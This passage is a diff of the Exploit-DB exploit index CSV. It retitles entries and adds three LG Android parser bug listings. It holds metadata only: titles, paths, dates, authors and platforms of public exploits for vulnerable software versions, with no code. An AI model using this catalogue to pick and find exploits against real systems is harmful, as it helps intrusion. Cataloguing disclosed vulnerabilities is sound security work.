Bermudo",hardware,dos,0 -38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service/Elevation of Privilege (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0 +38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0 38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0 38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0 @@ -4814,7 +4814,7 @@ id,file,description,date,author,platform,type,port 38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0 -38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0 +38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)",2015-11-12,"Nipun Jaswal",windows,dos,0 38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 @@ -4829,7 +4829,7 @@ id,file,description,date,author,platform,type,port 38747,platforms/windows/dos/38747.py,"Pwstore - Denial of Service",2013-04-16,"Josep Pi Rodriguez",windows,dos,0 38758,platforms/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 -38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0 +38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field Overflow (SEH)",2015-11-19,"Luis Martínez",windows,dos,0 38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash (PoC)",2015-11-19,"Vivek Mahajan",windows,dos,0 38763,platforms/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 38771,platforms/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 @@ -5000,7 +5000,7 @@ id,file,description,date,author,platform,type,port 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 -39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0 +39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - (SEH)Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 39454,platforms/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos,0 39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0 @@ -5051,7 +5051,7 @@ id,file,description,date,author,platform,type,port 39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 -39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow Denial of Service",2016-03-14,INSECT.B,windows,dos,0 +39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) Denial of Service",2016-03-14,INSECT.B,windows,dos,0 39560,platforms/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 @@ -5114,7 +5114,7 @@ id,file,description,date,author,platform,type,port 39776,platforms/windows/dos/39776.py,"CIScan 1.00 - Hostname/IP Field Crash (PoC)",2016-05-06,"Irving Aguilar",windows,dos,0 39778,platforms/windows/dos/39778.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (2)",2016-05-06,"Google Security Research",windows,dos,0 39779,platforms/windows/dos/39779.txt,"Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free",2016-05-06,"Google Security Research",windows,dos,0 -39782,platforms/windows/dos/39782.py,"i.FTP 2.21 - Host Address / URL Field SEH Exploit",2016-05-09,"Tantaryu MING",windows,dos,0 +39782,platforms/windows/dos/39782.py,"i.FTP 2.21 - Host Address / URL Field (SEH)",2016-05-09,"Tantaryu MING",windows,dos,0 39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64) - Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0 39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-09,"Nipun Jaswal",windows,dos,0 39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0 @@ -5478,7 +5478,7 @@ id,file,description,date,author,platform,type,port 41906,platforms/multiple/dos/41906.txt,"Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos,0 41911,platforms/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos,0 41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0 -41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0 +41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0 41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0 @@ -5540,6 +5540,9 @@ id,file,description,date,author,platform,type,port 42147,platforms/linux/dos/42147.txt,"libcroco 0.6.12 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0 42148,platforms/linux/dos/42148.txt,"libquicktime 1.2.4 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0 42162,platforms/linux/dos/42162.txt,"GStreamer gst-plugins-bad Plugin - NULL Pointer Dereference",2017-06-12,"Hanno Boeck",linux,dos,0 +42169,platforms/android/dos/42169.txt,"LG MRA58K - Out-of-Bounds Heap Read in CAVIFileParser::Destroy Resulting in Invalid Free",2017-06-13,"Google Security Research",android,dos,0 +42170,platforms/android/dos/42170.txt,"LG MRA58K - Missing Bounds-Checking in AVI Stream Parsing",2017-06-13,"Google Security Research",android,dos,0 +42171,platforms/android/dos/42171.txt,"LG MRA58K - 'ASFParser::ParseHeaderExtensionObjects' Missing Bounds-Checking",2017-06-13,"Google Security Research",android,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5644,7 +5647,7 @@ id,file,description,date,author,platform,type,port 338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation",1997-05-28,"David Hedley",solaris,local,0 339,platforms/linux/local/339.c,"zgv - '$HOME' Buffer Overflow",1997-06-20,"BeastMaster V",linux,local,0 341,platforms/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Overflows",1997-07-12,"Cristian Schipor",solaris,local,0 -350,platforms/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 +350,platforms/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 351,platforms/windows/local/351.c,"Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,windows,local,0 352,platforms/windows/local/352.c,"Microsoft Windows Server 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0 353,platforms/windows/local/353.c,"Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' Exploit (MS04-022)",2004-07-18,anonymous,windows,local,0 @@ -5796,7 +5799,7 @@ id,file,description,date,author,platform,type,port 1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Privilege Escalation",2005-08-30,vade79,osx,local,0 1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Privilege Escalation",2005-08-30,vade79,osx,local,0 1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0 -1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 +1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Escalation",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0 1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation",2005-09-14,Qnix,linux,local,0 1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation",2005-09-24,kingcope,linux,local,0 @@ -5921,7 +5924,7 @@ id,file,description,date,author,platform,type,port 2950,platforms/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0 3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure",2006-12-27,"Ruben Santamarta",windows,local,0 3070,platforms/osx/local/3070.pl,"VideoLAN VLC Media Player 0.8.6 (x86) - (udp://) Format String",2007-01-02,MoAB,osx,local,0 -3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation",2007-01-03,erasmus,windows,local,0 +3071,platforms/windows/local/3071.c,"Microsoft Vista - 'NtRaiseHardError' Privilege Escalation",2007-01-03,erasmus,windows,local,0 3087,platforms/osx/local/3087.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 3088,platforms/osx/local/3088.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM (cron) Privilege Escalation",2007-01-05,MoAB,osx,local,0 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x < 4.0 - vga_ioctl() Privilege Escalation",2007-01-07,"Critical Security",bsd,local,0 @@ -5962,7 +5965,7 @@ id,file,description,date,author,platform,type,port 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0 -3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",win_x86,local,0 +3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Escalation",2007-03-10,"Cesar Cerrudo",win_x86,local,0 3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0 3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 @@ -6005,7 +6008,7 @@ id,file,description,date,author,platform,type,port 3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0 3856,platforms/windows/local/3856.htm,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local,0 3888,platforms/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",win_x86,local,0 -3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0 +3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Escalation",2007-05-11,binagres,windows,local,0 3912,platforms/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,win_x86,local,0 3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0 3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 @@ -6017,7 +6020,7 @@ id,file,description,date,author,platform,type,port 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local,0 4080,platforms/windows/local/4080.php,"PHP 5.2.3 Tidy extension - Local Buffer Overflow",2007-06-19,rgod,windows,local,0 40465,platforms/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local,0 -4165,platforms/windows/local/4165.c,"WinPcap 4.0 - 'NPF.SYS' Privilege Elevation (PoC)",2007-07-10,"Mario Ballano Bárcena",windows,local,0 +4165,platforms/windows/local/4165.c,"WinPcap 4.0 - 'NPF.SYS' Privilege Escalation (PoC)",2007-07-10,"Mario Ballano Bárcena",windows,local,0 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)",2007-07-10,dreyer,linux,local,0 4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Privilege Escalation",2007-07-12,"Zohiartze Herce",windows,local,0 4203,platforms/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords Exploit",2007-07-19,bunker,multiple,local,0 @@ -6171,7 +6174,7 @@ id,file,description,date,author,platform,type,port 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0 7695,platforms/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,windows,local,0 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Stack Overflow",2009-01-08,DATA_SNIPER,windows,local,0 -7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow",2009-01-08,Cnaph,windows,local,0 +7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog Overflow (SEH)",2009-01-08,Cnaph,windows,local,0 7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (2)",2009-01-09,Houssamix,windows,local,0 7714,platforms/windows/local/7714.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (1)",2009-01-11,sCORPINo,windows,local,0 7715,platforms/windows/local/7715.py,"VUPlayer 2.49 - '.asx' (HREF) Universal Buffer Overflow",2009-01-11,His0k4,windows,local,0 @@ -6347,7 +6350,7 @@ id,file,description,date,author,platform,type,port 9286,platforms/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,windows,local,0 9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)",2009-07-28,Koshi,windows,local,0 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (update)",2009-07-30,corelanc0d3r,windows,local,0 -9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow XP SP3 (RET + SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0 +9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - '.lst' File Local Stack Overflow XP SP3 (RET + SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0 9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - 'win32k.sys' Privilege Escalation",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 - '.xbm' Local Buffer Overflow",2009-07-30,His0k4,linux,local,0 9305,platforms/windows/local/9305.txt,"EPSON Status Monitor 3 - Privilege Escalation",2009-07-30,Nine:Situations:Group,windows,local,0 @@ -6458,7 +6461,7 @@ id,file,description,date,author,platform,type,port 10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0 10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0 10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Exploit (PoC)",2009-10-02,mu-b,osx,local,0 -33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 +33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (Unicode SEH)",2014-05-19,"Mike Czumak",windows,local,0 10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Privilege Escalation",2009-10-13,"Maxim A. Kulakov",windows,local,0 10201,platforms/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0 10207,platforms/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0 @@ -6529,7 +6532,7 @@ id,file,description,date,author,platform,type,port 10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0 10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0 10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow",2009-12-30,mr_me,windows,local,0 -10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 +10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (Windows XP SP2 French)",2010-01-03,bibi-info,windows,local,0 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0 11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local,0 @@ -6556,7 +6559,7 @@ id,file,description,date,author,platform,type,port 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0 11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0 11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0 -11267,platforms/windows/local/11267.py,"Winamp 5.572 - SEH Exploit",2010-01-26,TecR0c,windows,local,0 +11267,platforms/windows/local/11267.py,"Winamp 5.572 - (SEH) Exploit",2010-01-26,TecR0c,windows,local,0 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0 11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow",2010-02-02,mr_me,windows,local,0 11315,platforms/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 @@ -6575,7 +6578,7 @@ id,file,description,date,author,platform,type,port 11491,platforms/multiple/local/11491.rb,"Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow",2010-02-17,"S2 Crew",multiple,local,0 11561,platforms/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing",2010-02-24,Unknown,multiple,local,0 11573,platforms/windows/local/11573.c,"Mediacoder 0.7.3.4605 - Local Buffer Overflow",2010-02-24,"fl0 fl0w",windows,local,0 -11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - '.orb' Local Universal SEH Overflow",2010-02-26,mr_me,windows,local,0 +11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)",2010-02-26,mr_me,windows,local,0 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - '.m3u' / '.pls'/ '.ypl' Buffer Overflow (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Privilege Escalation",2010-03-07,kingcope,multiple,local,0 11656,platforms/windows/local/11656.py,"QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 @@ -6606,29 +6609,29 @@ id,file,description,date,author,platform,type,port 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Exploit",2010-04-02,"Richard leahy",windows,local,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0 -12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - SEH Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 +12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - (SEH) Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0 -12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' SEH Exploit",2010-04-04,TecR0c,windows,local,0 -12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' SEH Exploit",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0 +12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' File (SEH)",2010-04-04,TecR0c,windows,local,0 +12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' File (SEH)",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0 12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0 12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 -12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 +12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0 -12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)",2010-04-16,blake,windows,local,0 +12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)",2010-04-16,blake,windows,local,0 12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,windows,local,0 -12368,platforms/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' SEH Exploit",2010-04-24,"TecR0c and Sud0",windows,local,0 +12368,platforms/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' File (SEH)",2010-04-24,"TecR0c and Sud0",windows,local,0 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Stack Buffer Overflow (PoC)",2010-04-25,mr_me,windows,local,0 12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Metasploit)",2010-04-25,blake,windows,local,0 12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local,0 12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local,0 12406,platforms/windows/local/12406.py,"Avast! 4.7 - 'aavmker4.sys' Privilege Escalation",2010-04-27,ryujin,windows,local,0 -12469,platforms/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup 